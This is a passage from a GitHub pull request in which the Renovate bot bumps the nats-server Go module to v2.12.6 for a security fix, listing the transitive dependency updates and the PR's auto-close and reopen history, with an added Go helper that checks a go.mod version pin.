  • The store_max_stream_bytes and memory_max_stream_bytes are no longer incorrectly applied when determining whether account resource limits have been exc

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot requested a review from a team as a code owner February 24, 2026 17:07
@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Feb 24, 2026
@renovate renovate Bot requested review from a team as code owners February 24, 2026 17:07
@renovate renovate Bot enabled auto-merge February 24, 2026 17:07
renovate Bot commented Feb 24, 2026

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 15 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.24.3 -> 1.25.0
github.com/nats-io/nats.go v1.47.0 -> v1.49.0
github.com/antithesishq/antithesis-sdk-go v0.4.3-default-no-op -> v0.6.0-default-no-op
github.com/google/go-tpm v0.9.6 -> v0.9.8
github.com/klauspost/compress v1.18.0 -> v1.18.4
github.com/minio/highwayhash v1.0.3 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.8.0 -> v2.8.1
github.com/nats-io/nkeys v0.4.11 -> v0.4.15
golang.org/x/mod v0.28.0 -> v0.33.0
golang.org/x/sync v0.17.0 -> v0.20.0
golang.org/x/time v0.14.0 -> v0.15.0
golang.org/x/tools v0.37.0 -> v0.42.0
golang.org/x/crypto v0.43.0 -> v0.49.0
golang.org/x/net v0.46.0 -> v0.51.0
golang.org/x/sys v0.37.0 -> v0.42.0
golang.org/x/text v0.30.0 -> v0.35.0

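As an added example (not code from this PR, Renovate, or the nats-server project), a minimal check a reviewer could run over the resulting go.mod to confirm that the module really ends up at or above the version this PR targets. The go.mod text below is constructed from the versions in the artifact notice, and the version comparison only understands plain vMAJOR.MINOR.PATCH tags (a pseudo-version suffix after "-" is dropped before comparing).

```go
package main

import (
	"strconv"
	"strings"
)

// Constructed go.mod excerpt (sample input, not the repository's real file).
const sampleGoMod = `module example.com/app
go 1.25.0
require (
	github.com/nats-io/nats-server/v2 v2.12.6
	github.com/nats-io/nats.go v1.49.0
)
`

// RequiredVersion returns the version pinned for modPath inside a go.mod
// require block, or "" if the module is not required there.
func RequiredVersion(goMod, modPath string) string {
	for _, line := range strings.Split(goMod, "\n") {
		f := strings.Fields(line)
		if len(f) >= 2 && f[0] == modPath {
			return f[1]
		}
	}
	return ""
}

// parts splits vMAJOR.MINOR.PATCH into integers, dropping any "-suffix".
func parts(v string) [3]int {
	v, _, _ = strings.Cut(strings.TrimPrefix(v, "v"), "-")
	var out [3]int
	for i, s := range strings.SplitN(v, ".", 3) {
		out[i], _ = strconv.Atoi(s)
	}
	return out
}

// AtLeast reports whether go.mod pins modPath at minVersion or newer.
func AtLeast(goMod, modPath, minVersion string) bool {
	got := RequiredVersion(goMod, modPath)
	if got == "" {
		return false // not required at all: nothing to vouch for
	}
	m := parts(minVersion)
	for i, g := range parts(got) {
		if g != m[i] {
			return g > m[i]
		}
	}
	return true
}
```
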
mergify[bot]
mergify Bot previously approved these changes Feb 24, 2026
@renovate renovate Bot dismissed stale reviews from infratographer-robot and mergify[bot] via 09fe8a5 March 24, 2026 20:42
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 200aa09 to 09fe8a5 Compare March 24, 2026 20:42
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.3 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Mar 24, 2026
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
auto-merge was automatically disabled March 27, 2026 02:03

Pull request was closed

@renovate renovate Bot deleted the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch March 27, 2026 02:03
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 09fe8a5 to c964bf4 Compare March 30, 2026 21:24
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] - autoclosed fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch 2 times, most recently from c964bf4 to 5fe43aa Compare April 27, 2026 22:07